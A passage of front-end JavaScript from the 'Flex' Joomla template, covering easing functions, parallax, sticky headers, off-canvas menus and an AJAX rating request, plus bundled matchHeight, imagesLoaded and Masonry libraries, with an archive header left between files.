g*Math.pow(2,-10*h)*Math.sin((h*k-i)*(2*Math.PI)/j)+l+e},easeInOutElastic:function(f,h,e,l,k){var i=1.70158;var j=0;var g=l;if(h==0){return e}if((h/=k/2)==2){return e+l}if(!j){j=k*(0.3*1.5)}if(g<Math.abs(l)){g=l;var i=j/4}else{var i=j/(2*Math.PI)*Math.asin(l/g)}if(h<1){return -0.5*(g*Math.pow(2,10*(h-=1))*Math.sin((h*k-i)*(2*Math.PI)/j))+e}return g*Math.pow(2,-10*(h-=1))*Math.sin((h*k-i)*(2*Math.PI)/j)*0.5+l+e},easeInBack:function(e,f,a,i,h,g){if(g==undefined){g=1.70158}return i*(f/=h)*f*((g+1)*f-g)+a},easeOutBack:function(e,f,a,i,h,g){if(g==undefined){g=1.70158}return i*((f=f/h-1)*f*((g+1)*f+g)+1)+a},easeInOutBack:function(e,f,a,i,h,g){if(g==undefined){g=1.70158}if((f/=h/2)<1){return i/2*(f*f*(((g*=(1.525))+1)*f-g))+a}return i/2*((f-=2)*f*(((g*=(1.525))+1)*f+g)+2)+a},easeInBounce:function(e,f,a,h,g){return h-jQuery.easing.easeOutBounce(e,g-f,0,h,g)+a},easeOutBounce:function(e,f,a,h,g){if((f/=g)<(1/2.75)){return h*(7.5625*f*f)+a}else{if(f<(2/2.75)){return h*(7.5625*(f-=(1.5/2.75))*f+0.75)+a}else{if(f<(2.5/2.75)){return h*(7.5625*(f-=(2.25/2.75))*f+0.9375)+a}else{return h*(7.5625*(f-=(2.625/2.75))*f+0.984375)+a}}}},easeInOutBounce:function(e,f,a,h,g){if(f<g/2){return jQuery.easing.easeInBounce(e,f*2,0,h,g)*0.5+a}return jQuery.easing.easeOutBounce(e,f*2-g,0,h,g)*0.5+h*0.5+a}});PK!O�k4�5�5flex/js/main.jsnu&1i�/**
 * Flex
 * Template Name - Flex 3.9.3
 * @author Aplikko http://www.aplikko.com
 * @copyright Copyright (c) 2020 Aplikko
 * @license http://www.gnu.org/licenses/gpl-2.0.html GNU/GPLv2 or later
*/

/* Parallax */
(function($){'use strict';var $window=$(window);var windowHeight=$window.height();$window.resize(function(){windowHeight=$window.height()});$.fn.parallaxing=function(xpos,speedFactor,outerHeight){var $this=$(this);var getHeight;var firstTop;var paddingTop=0;$this.each(function(){firstTop=$this.offset().top});if(outerHeight){getHeight=function(jqo){return jqo.outerHeight(!0)}}else{getHeight=function(jqo){return jqo.height()}}if(arguments.length<1||xpos===null)xpos="50%";if(arguments.length<2||speedFactor===null)speedFactor=0.1;if(arguments.length<3||outerHeight===null)outerHeight=!0;function update(){var pos=$window.scrollTop();$this.each(function(){var $element=$(this);var top=$element.offset().top;var height=getHeight($element);if(top+height<pos||top>pos+windowHeight){return}
$this.css('backgroundPosition',xpos+" "+Math.round((firstTop-pos)*speedFactor)+"px")})}
$window.bind('scroll',update).resize(update);update()}})(jQuery);
	
jQuery(function($) {
	
	/* Mootools Fix: add missing Mootools when Bootstrap is loaded */
	var bootstrapLoaded="function"==typeof $().carousel,mootoolsLoaded="undefined"!=typeof MooTools;bootstrapLoaded&&mootoolsLoaded&&Element.implement({hide:function(){return this},show:function(o){return this},slide:function(o){return this}});
	
	$(window).resize(function(){
    var $theWindowSize = $(this).width();
		if ($theWindowSize < 480) { 
			$(".animated_headlines .ah-words-wrapper > b").addClass("centered clearfix").css({"white-space":"normal"});
		} else {
			$(".animated_headlines .ah-words-wrapper > b").removeClass("centered").css("white-space","nowrap");
		}
		if($theWindowSize < 769) {
			$(".sppb-addon-image-content.aligment-left .col-sm-6").removeClass("col-sm-offset-6").css("width","100%");
		
		} else {
			$(".sppb-addon-image-content.aligment-left .col-sm-6").addClass("col-sm-offset-6").css("width","auto");
		}
    });
	// Fix for pixel wrong showing Image Content @ 768 pixels and mobile (480px)
	var isTablet = window.matchMedia("only screen and (max-width: 768px)");
	var isMobile = window.matchMedia("only screen and (max-width: 480px)");
    if (isTablet.matches) {
		$(".sppb-addon-image-content.aligment-left .col-sm-6").removeClass("col-sm-offset-6").css("width","100%");
	}
	if (isMobile.matches){
		$(".animated_headlines .ah-words-wrapper > b").addClass("centered clearfix").css({"white-space":"normal"});
	}
	
	//Showing Parallax only on desktop ("parallax" changed to "parallaxing", to avoid conflict with SPPB)
	var isDesktop = window.matchMedia("only screen and (min-width: 992px)");
    if (isDesktop.matches) {
		// =========== Parallax ===========
		 jQuery('.parallax').parallaxing("50%", 0.3);
		 jQuery('.parallax_2').parallaxing("50%", 0.2);
		 jQuery('.parallax_3').parallaxing("50%", 0.3);
		 jQuery('.parallax_4').parallaxing("50%", 0.4);
		 jQuery('.parallax_5').parallaxing("50%", 0.5);
		 jQuery('.parallax_6').parallaxing("50%", 0.6);
		 jQuery('.parallax_7').parallaxing("50%", 0.7);
		 jQuery('.parallax-2').parallaxing("50%", -0.2);
		 jQuery('.parallax-3').parallaxing("50%", -0.3);
		 jQuery('.parallax-4').parallaxing("50%", -0.4);
		 jQuery('.parallax-5').parallaxing("50%", -0.5);
		 jQuery('.parallax-6').parallaxing("50%", -0.6);
		 jQuery('.parallax-7').parallaxing("50%", -0.7);
	}
	 
    /* Boxed Layout */
	$(".layout-boxed section > div.container, .layout-boxed header > div.container, .layout-boxed footer > div.container, .layout-boxed header > div.container, .layout-boxed .sp-main-body > div.container").removeClass("container").addClass("container-fluid");

	
	if ($("div").hasClass("sppb-in-article")) {
		$(".sppb-row-container").removeClass("sppb-row-container");
	} 
	
	var spHeader = document.querySelector('#sp-header'),pageHeight = window.innerHeight;
	
	/* Sticky Header JS */
	if (typeof stickyHeaderVar === 'undefined' || stickyHeaderVar === '') {
		stickyHeaderVar = '0';
	}
    if (stickyHeaderVar == '1') {
		// Wrap Sticky Wrapper
		if ($("body").hasClass("sticky-header")) {
			$("#sp-header").children().wrapAll( $("<div>").addClass("sticky__wrapper"));
		}
		function checkHolderOffset() {return stickyHeaderAppearPoint <= window.scrollY;}
		var showSticky = function() {spHeader.classList.toggle('sticky', checkHolderOffset());}
		function tryCheck() {requestAnimationFrame(showSticky)}
		window.addEventListener('scroll', tryCheck, false);
		window.addEventListener('resize', tryCheck, false);
	}
	
    //Off-canvas Menu animations
    if (typeof sp_offanimation === 'undefined' || sp_offanimation === '') {
        sp_offanimation = 'default';
    }

    if (sp_offanimation == 'default') {
        $('#offcanvas-toggler').on('click', function (event) {
            event.preventDefault();

			$('.off-canvas-menu-init').addClass('offcanvas');
        });
        $('<div class="offcanvas-overlay"></div>').insertBefore('.offcanvas-menu');
        $('.close-offcanvas, .offcanvas-overlay').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').removeClass('offcanvas');
        });
    }
    // Slide Top Menu
    if (sp_offanimation == 'slidetop') {
        $('#offcanvas-toggler').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').addClass('slide-top-menu');
        });

        $('<div class="offcanvas-overlay"></div>').insertBefore('.offcanvas-menu');
        $('.close-offcanvas, .offcanvas-overlay').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').removeClass('slide-top-menu');
        });
    }
    //Full Screen
    if (sp_offanimation == 'fullscreen') {
        $('#offcanvas-toggler').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').addClass('full-screen-off-canvas');
        });
        $(document).ready(function () {
            $('.off-canvas-menu-init').addClass('full-screen');
        });
        $('.close-offcanvas, .offcanvas-overlay').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').removeClass('full-screen-off-canvas');
        });
    }
    //Full screen from top
    if (sp_offanimation == 'fullScreen-top') {
        $('#offcanvas-toggler').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').addClass('full-screen-off-canvas-ftop');
        });
        $(document).ready(function () {
            $('.off-canvas-menu-init').addClass('full-screen-ftop');
        });
        $('.close-offcanvas, .offcanvas-overlay').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').removeClass('full-screen-off-canvas-ftop');
        });
    }
    //Dark with plus
    if (sp_offanimation == 'drarkplus') {
        $('#offcanvas-toggler').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').addClass('new-look-off-canvas');
        });
        $('<div class="offcanvas-overlay"></div>').insertBefore('.offcanvas-menu');
        $(document).ready(function () {
            $('.off-canvas-menu-init').addClass('new-look');
        });
        $('.close-offcanvas,.offcanvas-overlay').on('click', function (event) {
            event.preventDefault();
            $('.off-canvas-menu-init').removeClass('new-look-off-canvas');
        });
    }
	
	// Close Off-canvas on click, in Off-canvas menu
	$('.offcanvas-menu ul li:not(.separator) a').on('click', function () {
       $('.off-canvas-menu-init').removeClass('offcanvas slide-top-menu full-screen-off-canvas full-screen-off-canvas-ftop new-look-off-canvas');
    });
	
	// Insert DIV arround Onepage, "white", "transparent" Header
	$( "header.onepage, header.white, header.transparent-white, header.transparent, header.sticky-top" ).wrap("<div class=\"transparent-wrapper\"></div>");

	// Top Bar Height to prevent overlapping with transparent-wrapper
	var topbarHeight = $("section[id^=\"sp-top-\"]").innerHeight();
	$(".transparent-wrapper").css({'top' : topbarHeight + 'px'});
	
	// First Megamenu link active in Onepage
	$('header.onepage .sp-megamenu-parent > li:first-child').addClass("active");
	// Scroll up/down to position
	$('.page-scroll a, a.page-scroll').bind('click', function(s) {
        var $anchor = $(this);
        $('html, body').stop().animate({
            scrollTop: $($anchor.attr('href')).offset().top
        }, 1500, 'easeInOutQuint');
        s.preventDefault();
		return false;
    });
	// Onepage menu scrolling
	$('header.onepage .sp-megamenu-parent li a').addClass("page-scroll");
	//one page nav with smooth scroll and active nav
	if ($("header").hasClass("onepage")) {
		$('.offcanvas-menu li a').addClass("page-scroll");
		$('header.onepage .sp-megamenu-parent, .offcanvas-menu .menu').onePageNav({
			currentClass: 'active',
			changeHash: false,
			scrollSpeed: 900,
			scrollOffset: 30,
			scrollThreshold: 0.5,
			easing: 'easeInOutCubic',
			filter: '.page-scroll'
		});
	} 

    //Top Search
    var searchRow = $(".top-search-input-wrap").parent().closest(".top-search-wrap");
    $(".top-search-input-wrap").insertAfter(searchRow);
    $(".search-open-icon").on("click", function () {
		$(".top-search-input-wrap").show();
        $(this).hide();
        $(".search-close-icon").addClass("open").fadeIn(300);
        $(".top-search-wrap").addClass("active");
    });

    $(".search-close-icon").on("click", function () {
        $(this).hide();
        $(".search-open-icon").fadeIn(300);
        $(".top-search-wrap").removeClass("active");
    });
	
	
	$(".no-gutter").closest("[class*=\"col-\"]").addClass("no-gutter");

    // Preloader
    if (typeof sp_preloader === 'undefined') {
        sp_preloader = '';
    }
    if (sp_preloader) {
        $(window).on('load', function () {
            if ($('.sp-loader-with-logo').length > 0) {
                move();
            }
            setTimeout(function () {
                $('.sp-pre-loader').fadeOut();
            }, 1000);
        });
    } // has preloader
    //preloader Function
    function move() {
        var elem = document.getElementById("line-load");
        var width = 1;
        var id = setInterval(frame, 10);
        function frame() {
            if (width >= 100) {
                clearInterval(id);
            } else {
                width++;
                elem.style.width = width + '%';
            }
        }
    }

    //Mega Menu
    $('.sp-megamenu-wrapper').parent().parent().css('position', 'static').parent().css('position', 'relative');
    $('.sp-menu-full').each(function () {
        $(this).parent().addClass('menu-justify');
    });

	// Disabling some clicks
	$(".social-icons > li > a[href=#],.separator > a,.sppb-person-social > li > a[href=#],.sppb-addon-content > a[href=#],a.sppb-btn[href=#],.slick-img > a[href=#],.sp-layer a[href=#],[data-toggle=\"popover\"],.flex-icons a[href=#]").click(function(n){
    	n.preventDefault();
	});
	
	//AP Smart LayerSlider hash
	$('a[href^=\"#ap-smart-layerslider-\"]').click(function(e){
		if ( window.history && window.history.pushState ) { 
			window.history.pushState('', '', window.location.pathname);
		} else { 
			window.location.href = window.location.href.replace(/#.*$/, '#'); 
		}
	});
	
    //Tooltip
    $('[data-toggle="tooltip"]').tooltip();
	
	//Popover
  	$('[data-toggle="popover"]').popover();

    // Article Ajax voting
    $(document).on('click', '.sp-rating .star', function (event) {
        event.preventDefault();
        var data = {
            'action': 'voting',
            'user_rating': $(this).data('number'),
            'id': $(this).closest('.post_rating').attr('id')
        };
        var request = {
            'option': 'com_ajax',
            'plugin': 'helix3',
            'data': data,
            'format': 'json'
        };
        $.ajax({
            type: 'POST',
            data: request,
            beforeSend: function () {
                $('.post_rating .ajax-loader').show();
            },
            success: function (response) {
                var data = $.parseJSON(response.data);
                $('.post_rating .ajax-loader').hide();

                if (data.status == 'invalid') {
                    $('.post_rating .voting-result').text('You have already rated this entry!').fadeIn('fast');
                } else if (data.status == 'false') {
                    $('.post_rating .voting-result').text('Somethings wrong here, try again!').fadeIn('fast');
                } else if (data.status == 'true') {
                    var rate = data.action;
                    $('.voting-symbol').find('.star').each(function (i) {
                        if (i < rate) {
                            $(".star").eq(-(i + 1)).addClass('active');
                        }
                    });
                    $('.post_rating .voting-result').text('Thank You!').fadeIn('fast');
                }
            },
            error: function () {
                $('.post_rating .ajax-loader').hide();
                $('.post_rating .voting-result').text('Failed to rate, try again!').fadeIn('fast');
            }
        });
    });
	
	// Scroll to Top
    jQuery('body').append('<a href=\"#top\" id=\"scroll-top\"><i class=\"pe-7s-angle-up\"></i></a>');
	/*------------- Scroll to Top ------------------*/
	$(window).scroll(function(){if($(this).scrollTop() > ( pageHeight * 2 )){$('a#scroll-top').addClass('open')}else{$('a#scroll-top').removeClass('open')}});$('a#scroll-top').click(function(){$("html,body").animate({scrollTop:0},1600,'easeInOutQuint',( pageHeight * 2 ));return false;});
//======== CSS Browser Selector v0.4.0 (https://github.com/rafaelp/css_browser_selector) ==========//
function css_browser_selector(u){var ua=u.toLowerCase(),is=function(t){return ua.indexOf(t)>-1},g='gecko',w='webkit',s='safari',o='opera',m='mobile',h=document.documentElement,b=[(!(/opera|webtv/i.test(ua))&&/msie\s(\d)/.test(ua))?('ie ie'+(/trident\/4\.0/.test(ua) ? '8' : RegExp.jQuery1)):is('firefox/2')?g+' ff2':is('firefox/3.5')?g+' ff3 ff3_5':is('firefox/3.6')?g+' ff3 ff3_6':is('firefox/3')?g+' ff3':is('gecko/')?g:is('opera')?o+(/version\/(\d+)/.test(ua)?' '+o+RegExp.jQuery1:(/opera(\s|\/)(\d+)/.test(ua)?' '+o+RegExp.jQuery2:'')):is('konqueror')?'konqueror':is('blackberry')?m+' blackberry':is('android')?m+' android':is('chrome')?w+' chrome':is('iron')?w+' iron':is('applewebkit/')?w+' '+s+(/version\/(\d+)/.test(ua)?' '+s+RegExp.jQuery1:''):is('mozilla/')?g:'',is('j2me')?m+' j2me':is('iphone')?m+' iphone':is('ipod')?m+' ipod':is('ipad')?m+' ipad':is('mac')?'mac':is('darwin')?'mac':is('webtv')?'webtv':is('win')?'win'+(is('windows nt 6.0')?' vista':''):is('freebsd')?'freebsd':(is('x11')||is('linux'))?'linux':'','js']; c = b.join(' '); h.className += ' '+c; return c;}; css_browser_selector(navigator.userAgent);	
/*  By Osvaldas Valutis, www.osvaldas.info; URL: https://osvaldas.info/drop-down-navigation-responsive-and-touch-friendly */
;(function(e,t,n,r){e.fn.doubleTapToGo=function(r){if(!("ontouchstart"in t)&&!navigator.msMaxTouchPoints&&!navigator.userAgent.toLowerCase().match(/windows phone os 7/i))return false;this.each(function(){var t=false;e(this).on("click",function(n){var r=e(this);if(r[0]!=t[0]){n.preventDefault();t=r}});e(n).on("click touchstart MSPointerDown",function(n){var r=true,i=e(n.target).parents();for(var s=0;s<i.length;s++)if(i[s]==t[0])r=false;if(r)t=false})});return this}})(jQuery,window,document);
// Apply dropdown fix for mobile
jQuery(".mobile .sp-megamenu-parent .sp-has-child:has(ul)").doubleTapToGo();		
});
/*
* jquery-match-height 0.7.2 by @liabru
* http://brm.io/jquery-match-height/
* License MIT
*/
!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery"],t):"undefined"!=typeof module&&module.exports?module.exports=t(require("jquery")):t(jQuery)}(function(t){var e=-1,o=-1,n=function(t){return parseFloat(t)||0},a=function(e){var o=1,a=t(e),i=null,r=[];return a.each(function(){var e=t(this),a=e.offset().top-n(e.css("margin-top")),s=r.length>0?r[r.length-1]:null;null===s?r.push(e):Math.floor(Math.abs(i-a))<=o?r[r.length-1]=s.add(e):r.push(e),i=a}),r},i=function(e){var o={
byRow:!0,property:"height",target:null,remove:!1};return"object"==typeof e?t.extend(o,e):("boolean"==typeof e?o.byRow=e:"remove"===e&&(o.remove=!0),o)},r=t.fn.matchHeight=function(e){var o=i(e);if(o.remove){var n=this;return this.css(o.property,""),t.each(r._groups,function(t,e){e.elements=e.elements.not(n)}),this}return this.length<=1&&!o.target?this:(r._groups.push({elements:this,options:o}),r._apply(this,o),this)};r.version="0.7.2",r._groups=[],r._throttle=80,r._maintainScroll=!1,r._beforeUpdate=null,
r._afterUpdate=null,r._rows=a,r._parse=n,r._parseOptions=i,r._apply=function(e,o){var s=i(o),h=t(e),l=[h],c=t(window).scrollTop(),p=t("html").outerHeight(!0),u=h.parents().filter(":hidden");return u.each(function(){var e=t(this);e.data("style-cache",e.attr("style"))}),u.css("display","block"),s.byRow&&!s.target&&(h.each(function(){var e=t(this),o=e.css("display");"inline-block"!==o&&"flex"!==o&&"inline-flex"!==o&&(o="block"),e.data("style-cache",e.attr("style")),e.css({display:o,"padding-top":"0",
"padding-bottom":"0","margin-top":"0","margin-bottom":"0","border-top-width":"0","border-bottom-width":"0",height:"100px",overflow:"hidden"})}),l=a(h),h.each(function(){var e=t(this);e.attr("style",e.data("style-cache")||"")})),t.each(l,function(e,o){var a=t(o),i=0;if(s.target)i=s.target.outerHeight(!1);else{if(s.byRow&&a.length<=1)return void a.css(s.property,"");a.each(function(){var e=t(this),o=e.attr("style"),n=e.css("display");"inline-block"!==n&&"flex"!==n&&"inline-flex"!==n&&(n="block");var a={
display:n};a[s.property]="",e.css(a),e.outerHeight(!1)>i&&(i=e.outerHeight(!1)),o?e.attr("style",o):e.css("display","")})}a.each(function(){var e=t(this),o=0;s.target&&e.is(s.target)||("border-box"!==e.css("box-sizing")&&(o+=n(e.css("border-top-width"))+n(e.css("border-bottom-width")),o+=n(e.css("padding-top"))+n(e.css("padding-bottom"))),e.css(s.property,i-o+"px"))})}),u.each(function(){var e=t(this);e.attr("style",e.data("style-cache")||null)}),r._maintainScroll&&t(window).scrollTop(c/p*t("html").outerHeight(!0)),
this},r._applyDataApi=function(){var e={};t("[data-match-height], [data-mh]").each(function(){var o=t(this),n=o.attr("data-mh")||o.attr("data-match-height");n in e?e[n]=e[n].add(o):e[n]=o}),t.each(e,function(){this.matchHeight(!0)})};var s=function(e){r._beforeUpdate&&r._beforeUpdate(e,r._groups),t.each(r._groups,function(){r._apply(this.elements,this.options)}),r._afterUpdate&&r._afterUpdate(e,r._groups)};r._update=function(n,a){if(a&&"resize"===a.type){var i=t(window).width();if(i===e)return;e=i;
}n?o===-1&&(o=setTimeout(function(){s(a),o=-1},r._throttle)):s(a)},t(r._applyDataApi);var h=t.fn.on?"on":"bind";t(window)[h]("load",function(t){r._update(!1,t)}),t(window)[h]("resize orientationchange",function(t){r._update(!0,t)})});
/*!
 * imagesLoaded PACKAGED v4.1.4
 */
!function(e,t){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",t):"object"==typeof module&&module.exports?module.exports=t():e.EvEmitter=t()}("undefined"!=typeof window?window:this,function(){function e(){}var t=e.prototype;return t.on=function(e,t){if(e&&t){var i=this._events=this._events||{},n=i[e]=i[e]||[];return n.indexOf(t)==-1&&n.push(t),this}},t.once=function(e,t){if(e&&t){this.on(e,t);var i=this._onceEvents=this._onceEvents||{},n=i[e]=i[e]||{};return n[t]=!0,this}},t.off=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){var n=i.indexOf(t);return n!=-1&&i.splice(n,1),this}},t.emitEvent=function(e,t){var i=this._events&&this._events[e];if(i&&i.length){i=i.slice(0),t=t||[];for(var n=this._onceEvents&&this._onceEvents[e],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(e,r),delete n[r]),r.apply(this,t)}return this}},t.allOff=function(){delete this._events,delete this._onceEvents},e}),function(e,t){"use strict";"function"==typeof define&&define.amd?define(["ev-emitter/ev-emitter"],function(i){return t(e,i)}):"object"==typeof module&&module.exports?module.exports=t(e,require("ev-emitter")):e.imagesLoaded=t(e,e.EvEmitter)}("undefined"!=typeof window?window:this,function(e,t){function i(e,t){for(var i in t)e[i]=t[i];return e}function n(e){if(Array.isArray(e))return e;var t="object"==typeof e&&"number"==typeof e.length;return t?d.call(e):[e]}function o(e,t,r){if(!(this instanceof o))return new o(e,t,r);var s=e;return"string"==typeof e&&(s=document.querySelectorAll(e)),s?(this.elements=n(s),this.options=i({},this.options),"function"==typeof t?r=t:i(this.options,t),r&&this.on("always",r),this.getImages(),h&&(this.jqDeferred=new h.Deferred),void setTimeout(this.check.bind(this))):void a.error("Bad element for imagesLoaded "+(s||e))}function r(e){this.img=e}function s(e,t){this.url=e,this.element=t,this.img=new Image}var h=e.jQuery,a=e.console,d=Array.prototype.slice;o.prototype=Object.create(t.prototype),o.prototype.options={},o.prototype.getImages=function(){this.images=[],this.elements.forEach(this.addElementImages,this)},o.prototype.addElementImages=function(e){"IMG"==e.nodeName&&this.addImage(e),this.options.background===!0&&this.addElementBackgroundImages(e);var t=e.nodeType;if(t&&u[t]){for(var i=e.querySelectorAll("img"),n=0;n<i.length;n++){var o=i[n];this.addImage(o)}if("string"==typeof this.options.background){var r=e.querySelectorAll(this.options.background);for(n=0;n<r.length;n++){var s=r[n];this.addElementBackgroundImages(s)}}}};var u={1:!0,9:!0,11:!0};return o.prototype.addElementBackgroundImages=function(e){var t=getComputedStyle(e);if(t)for(var i=/url\((['"])?(.*?)\1\)/gi,n=i.exec(t.backgroundImage);null!==n;){var o=n&&n[2];o&&this.addBackground(o,e),n=i.exec(t.backgroundImage)}},o.prototype.addImage=function(e){var t=new r(e);this.images.push(t)},o.prototype.addBackground=function(e,t){var i=new s(e,t);this.images.push(i)},o.prototype.check=function(){function e(e,i,n){setTimeout(function(){t.progress(e,i,n)})}var t=this;return this.progressedCount=0,this.hasAnyBroken=!1,this.images.length?void this.images.forEach(function(t){t.once("progress",e),t.check()}):void this.complete()},o.prototype.progress=function(e,t,i){this.progressedCount++,this.hasAnyBroken=this.hasAnyBroken||!e.isLoaded,this.emitEvent("progress",[this,e,t]),this.jqDeferred&&this.jqDeferred.notify&&this.jqDeferred.notify(this,e),this.progressedCount==this.images.length&&this.complete(),this.options.debug&&a&&a.log("progress: "+i,e,t)},o.prototype.complete=function(){var e=this.hasAnyBroken?"fail":"done";if(this.isComplete=!0,this.emitEvent(e,[this]),this.emitEvent("always",[this]),this.jqDeferred){var t=this.hasAnyBroken?"reject":"resolve";this.jqDeferred[t](this)}},r.prototype=Object.create(t.prototype),r.prototype.check=function(){var e=this.getIsImageComplete();return e?void this.confirm(0!==this.img.naturalWidth,"naturalWidth"):(this.proxyImage=new Image,this.proxyImage.addEventListener("load",this),this.proxyImage.addEventListener("error",this),this.img.addEventListener("load",this),this.img.addEventListener("error",this),void(this.proxyImage.src=this.img.src))},r.prototype.getIsImageComplete=function(){return this.img.complete&&this.img.naturalWidth},r.prototype.confirm=function(e,t){this.isLoaded=e,this.emitEvent("progress",[this,this.img,t])},r.prototype.handleEvent=function(e){var t="on"+e.type;this[t]&&this[t](e)},r.prototype.onload=function(){this.confirm(!0,"onload"),this.unbindEvents()},r.prototype.onerror=function(){this.confirm(!1,"onerror"),this.unbindEvents()},r.prototype.unbindEvents=function(){this.proxyImage.removeEventListener("load",this),this.proxyImage.removeEventListener("error",this),this.img.removeEventListener("load",this),this.img.removeEventListener("error",this)},s.prototype=Object.create(r.prototype),s.prototype.check=function(){this.img.addEventListener("load",this),this.img.addEventListener("error",this),this.img.src=this.url;var e=this.getIsImageComplete();e&&(this.confirm(0!==this.img.naturalWidth,"naturalWidth"),this.unbindEvents())},s.prototype.unbindEvents=function(){this.img.removeEventListener("load",this),this.img.removeEventListener("error",this)},s.prototype.confirm=function(e,t){this.isLoaded=e,this.emitEvent("progress",[this,this.element,t])},o.makeJQueryPlugin=function(t){t=t||e.jQuery,t&&(h=t,h.fn.imagesLoaded=function(e,t){var i=new o(this,e,t);return i.jqDeferred.promise(h(this))})},o.makeJQueryPlugin(),o});

//Match Height implementation
jQuery(function($) {$(".match-height").imagesLoaded(function(){$('.match-height').matchHeight()})});

/*!
 * Masonry PACKAGED v4.2.2 with changed "getSize" to "getSize_FIX" to avoid Mootools conflict (in front-end Article Editing)
 * https://masonry.desandro.com
 * MIT License
 * by David DeSandro
 */
!function(t,e){"function"==typeof define&&define.amd?define("jquery-bridget/jquery-bridget",["jquery"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("jquery")):t.jQueryBridget=e(t,t.jQuery)}(window,function(t,e){"use strict";function i(i,r,a){function h(t,e,n){var o,r="$()."+i+'("'+e+'")';return t.each(function(t,h){var u=a.data(h,i);if(!u)return void s(i+" not initialized. Cannot call methods, i.e. "+r);var d=u[e];if(!d||"_"==e.charAt(0))return void s(r+" is not a valid method");var l=d.apply(u,n);o=void 0===o?l:o}),void 0!==o?o:t}function u(t,e){t.each(function(t,n){var o=a.data(n,i);o?(o.option(e),o._init()):(o=new r(n,e),a.data(n,i,o))})}a=a||e||t.jQuery,a&&(r.prototype.option||(r.prototype.option=function(t){a.isPlainObject(t)&&(this.options=a.extend(!0,this.options,t))}),a.fn[i]=function(t){if("string"==typeof t){var e=o.call(arguments,1);return h(this,t,e)}return u(this,t),this},n(a))}function n(t){!t||t&&t.bridget||(t.bridget=i)}var o=Array.prototype.slice,r=t.console,s="undefined"==typeof r?function(){}:function(t){r.error(t)};return n(e||t.jQuery),i}),function(t,e){"function"==typeof define&&define.amd?define("ev-emitter/ev-emitter",e):"object"==typeof module&&module.exports?module.exports=e():t.EvEmitter=e()}("undefined"!=typeof window?window:this,function(){function t(){}var e=t.prototype;return e.on=function(t,e){if(t&&e){var i=this._events=this._events||{},n=i[t]=i[t]||[];return-1==n.indexOf(e)&&n.push(e),this}},e.once=function(t,e){if(t&&e){this.on(t,e);var i=this._onceEvents=this._onceEvents||{},n=i[t]=i[t]||{};return n[e]=!0,this}},e.off=function(t,e){var i=this._events&&this._events[t];if(i&&i.length){var n=i.indexOf(e);return-1!=n&&i.splice(n,1),this}},e.emitEvent=function(t,e){var i=this._events&&this._events[t];if(i&&i.length){i=i.slice(0),e=e||[];for(var n=this._onceEvents&&this._onceEvents[t],o=0;o<i.length;o++){var r=i[o],s=n&&n[r];s&&(this.off(t,r),delete n[r]),r.apply(this,e)}return this}},e.allOff=function(){delete this._events,delete this._onceEvents},t}),function(t,e){"function"==typeof define&&define.amd?define("get-size/get-size",e):"object"==typeof module&&module.exports?module.exports=e():t.getSize_FIX=e()}(window,function(){"use strict";function t(t){var e=parseFloat(t),i=-1==t.indexOf("%")&&!isNaN(e);return i&&e}function e(){}function i(){for(var t={width:0,height:0,innerWidth:0,innerHeight:0,outerWidth:0,outerHeight:0},e=0;u>e;e++){var i=h[e];t[i]=0}return t}function n(t){var e=getComputedStyle(t);return e||a("Style returned "+e+". Are you running this code in a hidden iframe on Firefox? See https://bit.ly/getsizebug1"),e}function o(){if(!d){d=!0;var e=document.createElement("div");e.style.width="200px",e.style.padding="1px 2px 3px 4px",e.style.borderStyle="solid",e.style.borderWidth="1px 2px 3px 4px",e.style.boxSizing="border-box";var i=document.body||document.documentElement;i.appendChild(e);var o=n(e);s=200==Math.round(t(o.width)),r.isBoxSizeOuter=s,i.removeChild(e)}}function r(e){if(o(),"string"==typeof e&&(e=document.querySelector(e)),e&&"object"==typeof e&&e.nodeType){var r=n(e);if("none"==r.display)return i();var a={};a.width=e.offsetWidth,a.height=e.offsetHeight;for(var d=a.isBorderBox="border-box"==r.boxSizing,l=0;u>l;l++){var c=h[l],f=r[c],m=parseFloat(f);a[c]=isNaN(m)?0:m}var p=a.paddingLeft+a.paddingRight,g=a.paddingTop+a.paddingBottom,y=a.marginLeft+a.marginRight,v=a.marginTop+a.marginBottom,_=a.borderLeftWidth+a.borderRightWidth,z=a.borderTopWidth+a.borderBottomWidth,E=d&&s,b=t(r.width);b!==!1&&(a.width=b+(E?0:p+_));var x=t(r.height);return x!==!1&&(a.height=x+(E?0:g+z)),a.innerWidth=a.width-(p+_),a.innerHeight=a.height-(g+z),a.outerWidth=a.width+y,a.outerHeight=a.height+v,a}}var s,a="undefined"==typeof console?e:function(t){console.error(t)},h=["paddingLeft","paddingRight","paddingTop","paddingBottom","marginLeft","marginRight","marginTop","marginBottom","borderLeftWidth","borderRightWidth","borderTopWidth","borderBottomWidth"],u=h.length,d=!1;return r}),function(t,e){"use strict";"function"==typeof define&&define.amd?define("desandro-matches-selector/matches-selector",e):"object"==typeof module&&module.exports?module.exports=e():t.matchesSelector=e()}(window,function(){"use strict";var t=function(){var t=window.Element.prototype;if(t.matches)return"matches";if(t.matchesSelector)return"matchesSelector";for(var e=["webkit","moz","ms","o"],i=0;i<e.length;i++){var n=e[i],o=n+"MatchesSelector";if(t[o])return o}}();return function(e,i){return e[t](i)}}),function(t,e){"function"==typeof define&&define.amd?define("fizzy-ui-utils/utils",["desandro-matches-selector/matches-selector"],function(i){return e(t,i)}):"object"==typeof module&&module.exports?module.exports=e(t,require("desandro-matches-selector")):t.fizzyUIUtils=e(t,t.matchesSelector)}(window,function(t,e){var i={};i.extend=function(t,e){for(var i in e)t[i]=e[i];return t},i.modulo=function(t,e){return(t%e+e)%e};var n=Array.prototype.slice;i.makeArray=function(t){if(Array.isArray(t))return t;if(null===t||void 0===t)return[];var e="object"==typeof t&&"number"==typeof t.length;return e?n.call(t):[t]},i.removeFrom=function(t,e){var 